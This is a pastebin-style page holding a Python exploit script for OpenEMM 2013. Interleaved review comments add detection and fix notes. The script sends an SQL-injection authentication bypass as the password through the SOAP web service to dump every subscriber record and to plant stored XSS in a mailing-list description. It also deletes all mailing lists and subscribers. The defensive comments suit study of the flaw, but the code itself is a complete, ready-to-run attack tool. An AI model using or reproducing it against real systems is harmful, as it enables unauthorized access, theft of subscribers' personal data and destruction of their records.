
openemm sploit

a guest Jul 23rd, 2013 101 Never
  1. import os
  2. import sys
  3. from SOAPpy import WSDL
  4. from argparse import ArgumentParser
  5. from re import sub
  6.  
  7. # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
  8. # Date: 07/20/2013
  9. # Exploit Author: drone (@dronesec)
  10. # Vendor Homepage: http://www.openemm.org/
  11. # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
  12. # Version: 2013 (8.10.380.hf13.0.066)
  13. # Tested on: Ubuntu 12.04
  14.  
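  15. """ Exploits a host of vulnerabilities discovered in OpenEMM (SQL injection and stored XSS, per the header above).
  16.    The required ws.wsdl file must be in the current working directory; it is rewritten in place on every run.
  17. """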
  18. def run(options):
  19.     """ Run the one action selected on the command line against the OpenEMM
          web service, through a SOAP proxy built from the local ./ws.wsdl.

          Every call passes the fixed user name "wsadmin" and, as its second
          argument, the SQL-injection string held in `sploit` (presumably the
          password field -- confirm against ws.wsdl). The header of this file
          describes the flaw as SQL injection; presumably the service
          concatenates that argument into its credential query -- TODO confirm
          against the OpenEMM source. If so, the server-side fix is a
          parameterised query for the credential check.

          options -- argparse namespace from parse_args(). The first truthy
                     attribute among subscribers, mlist, dmlist, dsubs selects
                     the branch; at most one branch runs per invocation.

          Nothing is returned; results are printed to stdout.

          NOTE(review): the dmlist and dsubs branches are destructive. They
          issue delete calls for ids 1, 2, 3, ... until the service returns 0.
  20.    """
  21.     wsdl_file = "./ws.wsdl"
          # Sent verbatim as the second argument of every call below. Quote
          # characters or a boolean tautology in that field of a SOAP request
          # are a strong indicator to alert on in web-service logs or a WAF.
  22.     sploit = "\\' OR 1=1;-- "
  23.  
          # SOAPpy builds the client from the local WSDL; the endpoint contacted is
          # whatever location= attribute that file carries (parse_args rewrites it).
  24.     _server = WSDL.Proxy(wsdl_file)
  25.  
  26.     if options.subscribers:
  27.         # iterate until we get a null response
              # Ids are requested sequentially starting at 1 and each record's
              # paramValues is printed as returned. A run of consecutive
              # getSubscriber calls from one client is the server-side trace.
  28.         idx = 1
  29.         while True:
  30.             ret = _server.getSubscriber("wsadmin", sploit, idx)
  31.             if ret.paramValues == '':
                      # idx is the first id with an empty answer, hence idx-1 records.
  32.                 print '[!] Discovered %d subscribers'%(idx-1)
  33.                 break
  34.  
  35.             print ret.paramValues
  36.             idx += 1
  37.  
  38.     elif options.mlist:
              # The description is stored by the service unchanged; the script's own
              # message states that the field is a stored-XSS sink. The mitigation is
              # to HTML-encode the description wherever the admin UI renders it.
              # NOTE(review): the bare except also swallows KeyboardInterrupt and
              # EOFError, so an aborted prompt silently becomes an empty description.
  39.         try:
  40.             print '[!] Description field vulnerable to stored xss!'
  41.             description = raw_input('[!] Enter mlist description: ')
  42.         except:
  43.             description = ''
  44.  
              # options.mlist is the new list's name; a return value above 0 is
              # treated as success.
  45.         ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
  46.         if ret > 0: print '[!] Saved successfully'
  47.         else:       print '[!] Save unsuccessful'
  48.  
  49.     elif options.dmlist:
              # Destructive: deletes mailing lists by id, starting at 1, until a
              # delete call returns 0.
  50.         print '[!] Deleting all mailing lists...'
  51.         idx = 1
  52.         while True:
  53.             ret = _server.deleteMailinglist('wsadmin', sploit, idx)
  54.             if ret == 0:
                      # NOTE(review): idx is the id whose delete returned 0, so the
                      # figure printed is one more than the number of successful
                      # deletes (the subscribers branch prints idx-1).
  55.                 print '[!] Deleted %d mailing lists.'%idx
  56.                 break
  57.             idx += 1
  58.  
  59.     elif options.dsubs:
              # Destructive: deletes subscribers by id, starting at 1, until a
              # delete call returns 0.
  60.         print '[!] Deleting all subscribers...'
  61.         idx = 1
  62.         while True:
  63.             ret = _server.deleteSubscriber('wsadmin', sploit, idx)
  64.             if ret == 0:
                      # NOTE(review): same reporting off-by-one as the dmlist branch.
  65.                 print '[!] Deleted %d subscribers.'%idx
  66.                 break
  67.             idx += 1
  68.  
  69. def parse_args():
  70.     """ Parse the command line and point ws.wsdl at the requested server.

          Options: -i HOST (required), -s (list subscribers), -m NAME (create a
          mailing list), --dm (delete all mailing lists), --ds (delete all
          subscribers).

          Side effects: copies ws.wsdl to tmp.wsdl with every location="..."
          attribute replaced by http://HOST:8080/emm_webservice, then moves
          tmp.wsdl over ws.wsdl. The original endpoint in ws.wsdl is therefore
          lost after the first run. Exits with status 1 on IOError.

          Returns the argparse namespace.
  71.    """
  72.     parser = ArgumentParser()
  73.     parser.add_argument('-i', help='server address', action='store',
  74.                 dest='host', required=True)
  75.     parser.add_argument('-s', help='fetch all subscribers', action='store_true',
  76.                 dest='subscribers')
  77.     parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
  78.                 dest='mlist')
  79.     parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
  80.                 dest='dmlist')
  81.     parser.add_argument('--ds', help='delete all subscribers', action='store_true',
  82.                 dest='dsubs')
  83.  
  84.     options = parser.parse_args()
  85.     try:
  86.         # sub in server address
  87.         with open('ws.wsdl', 'r') as f:
                  # NOTE(review): `out` is not managed by a with-block; if the loop
                  # raises, out.close() below is skipped and tmp.wsdl is left behind.
  88.             out = open('tmp.wsdl', 'w+')
  89.             for line in f:
                      # options.host goes into the replacement text unvalidated, and
                      # re.sub interprets backslash sequences in a replacement string.
                      # The endpoint is plain http on port 8080, so everything run()
                      # sends is unencrypted and visible to network monitoring; that
                      # port should only be reachable from trusted management hosts.
  90.                 line = sub('location="(.*?)"',
  91.                     'location="http://{0}:8080/emm_webservice"'.format(options.host),
  92.                     line)
  93.                 out.write(line)
  94.             out.close()
  95.     except IOError:
              # NOTE(review): an IOError raised while writing tmp.wsdl is reported
              # with this same "not found" message.
  96.         print '[-] ws.wsdl not found'
  97.         sys.exit(1)
  98.  
  99.     # replace ws.wsdl with temp one
           # NOTE(review): shells out to `mv` and ignores its exit status;
           # os.rename('tmp.wsdl', 'ws.wsdl') would do the same without a shell.
  100.     os.system('mv tmp.wsdl ws.wsdl')
  101.     return options
  102.  
  103. if __name__ == "__main__":
           # Order matters: parse_args() rewrites ws.wsdl with the target address
           # before run() loads that file to build its SOAP proxy.
  104.     options = parse_args()
  105.     run(options)